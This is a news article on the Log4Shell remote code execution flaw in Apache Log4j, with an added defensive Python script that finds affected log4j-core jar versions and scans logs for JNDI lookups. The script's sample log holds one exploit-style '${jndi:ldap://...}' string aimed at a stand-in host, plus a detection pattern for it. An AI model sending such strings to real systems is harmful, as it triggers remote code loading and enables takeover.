The Apache Software Foundation has published fixes for an actively exploited zero-day vulnerability affecting Apache Log4j. Log4j is a widely used Java logging library, and the flaw can be weaponized to execute malicious code and allow a complete takeover of vulnerable systems.
Tracked as CVE-2021-44228, nicknamed “Log4Shell” or “LogJam” and discovered by Alibaba’s security team, the issue is an unauthenticated remote code execution (RCE) in any application that uses this open-source utility, and it affects unpatched versions of Apache Log4j from 2.0-beta9 through 2.14.1. The flaw was rated with the maximum score of 10 out of 10 on the CVSS scale, which reflects the enormous severity of the problem.
Exploitation can be accomplished with a single text string: if that string is logged through a vulnerable instance of Log4j, the application connects to a malicious external host, giving the attacker the ability to retrieve a payload from a remote server and run it locally.
The Apache Foundation recommends updating systems as soon as possible to the new version 2.15.0, which fixes the bug by disabling the behaviour that, in previous versions, let an attacker who could control log messages or log parameters execute arbitrary code loaded from LDAP servers when message lookup substitution was enabled. That lookup behaviour is now disabled by default.
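Two practical checks follow from the paragraphs above: identifying which deployed log4j-core jars fall in the affected 2.0-beta9 through 2.14.1 range, and spotting the lookup string in logs that pass through the library. The script below is an added example, not code from the article or from the Apache project; the jar paths and access-log lines are constructed sample data, and the `find_vulnerable_jars` / `find_lookup_attempts` helpers are names chosen here.

```python
import re
from pathlib import PurePath

# Affected range as stated in the advisory: Apache Log4j 2.0-beta9 through 2.14.1.
# 2.15.0 is the first release that disables message lookup substitution by default.
FIXED_VERSION = (2, 15, 0)

# Jar names follow the Maven convention log4j-core-<version>.jar,
# e.g. log4j-core-2.14.1.jar or log4j-core-2.0-beta9.jar.
_JAR_RE = re.compile(r"^log4j-core-(\d+)\.(\d+)(?:\.(\d+))?(?:-beta(\d+))?\.jar$")


def parse_log4j_core_version(jar_path):
    """Return (major, minor, patch, beta) for a log4j-core jar filename, or None
    when the file is not the log4j-core module (log4j-api, other libraries)."""
    m = _JAR_RE.match(PurePath(jar_path).name)
    if not m:
        return None
    major, minor, patch, beta = m.groups()
    return (int(major), int(minor), int(patch) if patch else 0,
            int(beta) if beta else None)


def is_vulnerable_version(version):
    """True if the version is inside the 2.0-beta9 .. 2.14.1 range the advisory lists."""
    major, minor, patch, beta = version
    if major != 2:
        return False
    if beta is not None:
        # Pre-release builds: only 2.0-beta9 and later betas are listed as affected.
        return (minor, patch) == (0, 0) and beta >= 9
    return (major, minor, patch) < FIXED_VERSION


def find_vulnerable_jars(jar_paths):
    """Return the paths whose log4j-core version is in the affected range."""
    vulnerable = []
    for path in jar_paths:
        version = parse_log4j_core_version(path)
        if version is not None and is_vulnerable_version(version):
            vulnerable.append(path)
    return vulnerable


# Minimal signature for the lookup the article describes: a logged string that
# opens a JNDI lookup. Matched case-insensitively; production detections use
# broader rules, this is only the core pattern.
_LOOKUP_RE = re.compile(r"\$\{\s*jndi\s*:", re.IGNORECASE)


def find_lookup_attempts(lines):
    """Return (line_number, line) pairs whose text contains a JNDI lookup pattern."""
    return [(n, line) for n, line in enumerate(lines, 1) if _LOOKUP_RE.search(line)]


# Constructed sample inventory: two affected jars, one fixed jar, one non-core jar.
SAMPLE_JARS = [
    "/opt/app/lib/log4j-core-2.14.1.jar",
    "/opt/other/lib/log4j-core-2.15.0.jar",
    "/opt/legacy/lib/log4j-core-2.0-beta9.jar",
    "/opt/legacy/lib/log4j-api-2.14.1.jar",
]

# Constructed sample access-log lines; the second carries the lookup in its
# User-Agent field, pointing at a reserved .example hostname.
SAMPLE_ACCESS_LOG = [
    '203.0.113.7 - - [10/Dec/2021:12:00:01 +0000] "GET / HTTP/1.1" 200 512 "-" "Mozilla/5.0"',
    '203.0.113.9 - - [10/Dec/2021:12:00:02 +0000] "GET / HTTP/1.1" 200 512 "-" '
    '"${jndi:ldap://lookup-host.example/a}"',
    '198.51.100.4 - - [10/Dec/2021:12:00:03 +0000] "GET /health HTTP/1.1" 200 2 "-" "curl/7.68.0"',
]


if __name__ == "__main__":
    for path in find_vulnerable_jars(SAMPLE_JARS):
        print("affected jar:", path)
    for n, line in find_lookup_attempts(SAMPLE_ACCESS_LOG):
        print(f"lookup pattern on line {n}: {line}")
```

The version check deliberately returns `None` for jars it cannot classify instead of guessing, so an unknown artifact shows up as "not assessed" rather than silently passing; the log check is only a first-pass signature and should feed a proper alert pipeline rather than replace one.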
Log4Shell in Apache Log4j
«The Apache Log4j zero-day vulnerability is probably the most critical vulnerability we’ve seen this year», explains Bharat Jogi from Qualys’s cybersecurity department. «Log4j is a ubiquitous library used by millions of Java applications to log error messages. This vulnerability is trivial to exploit».
Log4j is used as the logging package in a wide range of popular software from many vendors, including Amazon, Apple iCloud, Cisco, Cloudflare, ElasticSearch, Red Hat, Steam, Tesla, Twitter and even video games such as Minecraft. In the latter case, attackers have been able to execute malicious code remotely simply by pasting a specially crafted message into the chat box.
Large cybersecurity firms such as BitDefender and Cisco Talos have confirmed evidence of mass scanning for vulnerable servers running affected applications, and have recorded attacks against their honeypot networks using a proof-of-concept exploit. Their warning: «This is a low-skill attack that is extremely simple to execute».
Given its enormous danger, the ease of exploitation and the prevalence of this library in enterprise IT services and DevOps, attacks targeting susceptible servers are expected to increase in the coming days, so it is imperative to address the flaw immediately.
The Israeli cybersecurity firm Cybereason has also released a tool called «Logout4Shell» that closes the hole by using the vulnerability itself to reconfigure the logger and prevent further exploitation. In every case, however, the recommendation is to update to the latest version of Apache Log4j.